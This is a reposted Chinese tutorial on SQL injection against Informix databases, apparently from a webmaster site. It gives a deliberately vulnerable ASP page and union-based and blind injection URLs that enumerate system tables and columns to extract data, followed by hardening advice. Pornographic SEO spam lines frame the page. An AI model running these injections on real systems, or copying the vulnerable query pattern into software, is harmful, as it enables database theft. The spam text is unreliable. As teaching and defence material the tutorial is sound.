青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

Informix注入整理

2022-9-24 10:19| 查看: 3088 |來源: 互聯(lián)網(wǎng)

前些時(shí)間做一個(gè)滲透測(cè)試,數(shù)據(jù)庫(kù)是informix的。整理了一下。 informix數(shù)據(jù)類型比較復(fù)雜,在union查詢中最郁悶的就是匹配字段的問題 數(shù)據(jù)類型如下 inform ...

前些時(shí)間做一個(gè)滲透測(cè)試,數(shù)據(jù)庫(kù)是informix的。整理了一下。

informix數(shù)據(jù)類型比較復(fù)雜,在union查詢中最郁悶的就是匹配字段的問題
數(shù)據(jù)類型如下
informix的字段類型  
char(size)  
varchar(size)
serial
nchar(size)  
nvarchar(size)
real
interval
date
datetime
integer
smallint
float
smallfloat
money(p,s)
decimal(p,s)
text  
byte  
如果字段數(shù)量和類型都匹配了 那么得到數(shù)據(jù)很容易
****************************************************
測(cè)試環(huán)境:  
reate table test(name char(32),id int)
****************************************************
ASP代碼
====================================================
<%
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open "dsn=poison;uid=informix;pwd=xxxxxx"
id=request("id")
strSQL = "select name from test where id=" & id
set rs=conn.execute(strSQL)
response.write(rs("name"))
rs.close
conn.close
%>
=====================================================
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select dbservername from systables;  
dbservername,返回?cái)?shù)據(jù)庫(kù)服務(wù)器的名稱
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select user from systables;
user,返回執(zhí)行查詢的用戶的用戶名(登陸帳戶名)
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(today) from systables;
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’sqlca.sqlerrd1’)) from systables;
返回任何表中插入的最后一個(gè)SERIAL值
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’version’, ’full’)) from systables;
***************************************************************************************************************************

得到任何數(shù)據(jù)
兩個(gè)重要的系統(tǒng)表  
systables:描述數(shù)據(jù)庫(kù)中的很張表;  
syscolumns:描述數(shù)據(jù)庫(kù)中表的列;  
==============================================
select * from systables
tabname syscolumns
owner informix
partnum 1048580
tabid 2
rowsize 157
ncols 10
nindexes 2
nrows 2353.000000000
created 04/28/2008
version 65539
tabtype T
locklevel R
npused 25.00000000000
fextsize 32
nextsize 32
flags 0
site
dbname
type_xid 0
am_id 0
pagesize 4096
ustlowts 2008-04-28 22:26:00.00000
secpolicyid 0
protgranularity
==================================================
select * from syscolumns
colname tabname
tabid 1
colno 1
coltype 13
collength 128
colmin 541543519
colmax 1937339256
extended_id 0
seclabelid 0
colattr 0
===================================================
這樣就可以得到任何表任何列的信息了  
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(count(*)) from systables
因?yàn)閕nformix中利用first n 經(jīng)常會(huì)出現(xiàn)"Cannot use "first", "limit" or "skip" in this context"的問題
(我也不知道什么原因 一些工具也就無法遞歸猜解數(shù)據(jù))
systables 中tabid順序排列 可以窮舉得到所有表名  
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select tabname from systables where tabid=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select tabname from systables where tabid=n
得到tabid和tabname的對(duì)應(yīng)關(guān)系  
and 1=2 union select colname from syscolumns where tabid=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=2
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=n
得到tabid=100 對(duì)應(yīng)表的所有列
表列都有了 直接暴數(shù)據(jù)
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
不能union只能以為以為去猜 和ACCESS沒什么太大的區(qū)別
注意只是一些函數(shù)的差別
length長(zhǎng)度
substr 返回字符串中的某一部分,例substr(col,1,2)
substring 返回字符串中的某一部分,例substring(col,from 1 to 4)
我沒有找到ASCII轉(zhuǎn)化的函數(shù)
可以用字符表示 例’a’=substr(admin,1,1)
或者用十六進(jìn)制函數(shù)
hex返回表達(dá)式的十六進(jìn)制數(shù)

保護(hù)informix  
為服務(wù)器持續(xù)打補(bǔ)丁
每當(dāng)IBM發(fā)布新補(bǔ)丁的時(shí)候,應(yīng)該盡可能地測(cè)試這些補(bǔ)丁并將其部署到生產(chǎn)系統(tǒng)上去
加密網(wǎng)絡(luò)通信量
應(yīng)該加密服務(wù)器和客戶機(jī)之間的通信量。這有助于保護(hù)用戶賬戶以及阻止通過網(wǎng)絡(luò)竊取數(shù)據(jù)。通過使用Communication Support Module(通信支持模塊)可以實(shí)現(xiàn)這一點(diǎn)。請(qǐng)參看Informix Server Administrator’s Guide(Informix服務(wù)器管理員指南)

取消Public的Connect特權(quán)
默認(rèn)地,public被授予了connect特權(quán)。這意味著任何人,只要持有有效的操作系統(tǒng)用戶ID和口令,都可以連接到數(shù)據(jù)庫(kù)服務(wù)器。

啟用審計(jì)
應(yīng)該對(duì)關(guān)鍵事件進(jìn)行審計(jì),例如登陸嘗試失敗。更多細(xì)節(jié)請(qǐng)參看Administrators Guid或者Trusted Facility Guide。

取消Public對(duì)文件訪問例程的權(quán)限
默認(rèn)地,public可以執(zhí)行文件訪問函數(shù),例如lotofile、filetoclob 和ifx_file_to_file。這將允許攻擊者讀、寫服務(wù)器上的文件。為幫助解決這一安全漏洞,創(chuàng)建一個(gè)名為FileAccess的角色,按照嚴(yán)格的業(yè)務(wù)需求,只把那些需要訪問文件的用戶分配為該角色的成員。然后為該角色分配對(duì)文件訪問例程的執(zhí)行權(quán)限,并取消public的執(zhí)行權(quán)限。
取消Public對(duì)模塊例程的執(zhí)行權(quán)限
默認(rèn)地,public可以執(zhí)行模塊函數(shù),例如ifx_replace_module、ifx_load_internal和reload_module。這將允許攻擊者強(qiáng)制Informix服務(wù)器加載任意的庫(kù)并像Informix用戶一樣執(zhí)行代碼。為幫助解決這一安全漏洞,創(chuàng)建一個(gè)名為 ModuleAccess的角色,按照嚴(yán)格的業(yè)務(wù)需求,只把那些需要加載模塊的用戶分配為該角色的成員。然后為該角色分配對(duì)這些例程的執(zhí)行權(quán)限,并取消 public的執(zhí)行權(quán)限。
阻止轉(zhuǎn)儲(chǔ)共享內(nèi)存
在服務(wù)器崩潰事件中,可以將Informix配置為將共享內(nèi)存段轉(zhuǎn)儲(chǔ)到磁盤。這是默認(rèn)配置。因?yàn)檫@些轉(zhuǎn)儲(chǔ)文件是完全可讀的且包含用戶名和口令,將Informix配置為不轉(zhuǎn)儲(chǔ)共享內(nèi)存將更合適。為此,編輯onconfig文件并將 DUMPSHMEM參數(shù)設(shè)置為0。然后停止并重啟服務(wù)器。
阻止對(duì)基于Unix的服務(wù)器的本地攻擊
Informix遭受的基于Unix平臺(tái)的大部分本地安全問題都源自setuid root程序和setgid Informix程序。為了列舉所有這樣的程序,轉(zhuǎn)到$INFORMIXDIR/bin目錄下并發(fā)出下面的命令:
find ./ -perm  4000
這將列舉bin目錄內(nèi)的全部setuid程序。防止本地用戶攻擊setuid程序的最簡(jiǎn)單的辦法是刪除other的執(zhí)行權(quán)限;實(shí)際上,可以簡(jiǎn)單地刪除others的全部權(quán)限:
chmod * o-rwx

限制語言Usage權(quán)限
應(yīng)該限制被授予了C和Java例程語言u(píng)sage權(quán)限的用戶的數(shù)量。擁有這些語言的usage權(quán)限的任何人都可以像Informix用戶一樣運(yùn)行代碼。

有用文檔
下述文檔值得一讀:
IBM Informix Dynamic Server Administrator’s Guide:http://publibfp.boulder.ibm.com/epubs/pdf/ct1ucna.pdf
IBM Informix Trusted Facility Guide:http://publibfp.boulder.ibm.com/epubs/pdf/ct1tbna.pdf
IBM Informix Guide to SQL:http://publibfi.boulder.ibm.com/epubs/pdf/ct1sqna.pdf

tag標(biāo)簽:Informix Informix注入
本文最后更新于 2022-9-24 10:19,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 日本一二三区视频在线 | 日韩精品久久久久影院 | 国产欧美一本道无码 | 激情A片久久久久久久 | 国产又粗又黄又爽的大片 | 中文字幕在线不卡日本v二区 | 性春院| AV无码九九久久 | 国产精品免费观看视频播放 | 国产精品视频成人 | 野花日本韩国视频免费高清观看 | 伊人影院综合 | 第一福利视频网站在线 | 秋霞三级理伦免费观看 | 中文国产成人精品久久免费 | 色姣姣狠狠撩综合网 | 久久久精品久久久久特色影视 | 囯产精品麻豆巨作久久 | 视频一区亚洲视频无码 | 肉肉的各种姿势高H细文 | 美女张开腿让我了一夜 | 成人免费肉动漫无遮网站 | 污文啊好棒棒啊好了 | 日本双渗透 | 狠狠撩色姣姣综合久久 | 色偷偷av男人的天堂 | 国产电影一区二区三区 | 最近中文字幕MV免费高清视频8 | 中文字幕在线视频网站 | 亚洲精品无码不卡在线播HE | 蜜臀AV99无码精品国产专区 | 久久视频在线视频观看天天看视频 | 久九九精品免费视频 | 极品少妇高潮啪啪AV无码吴梦梦 | 久久这里只有精品国产精品99 | 3DNagoonimation动漫| 国产做国产爱免费视频 | 伦理片2499电影伦理片 | 国产成人久久AV免费看澳门 | 两个人的视频免费 | 欧美日韩中文国产一区发布 |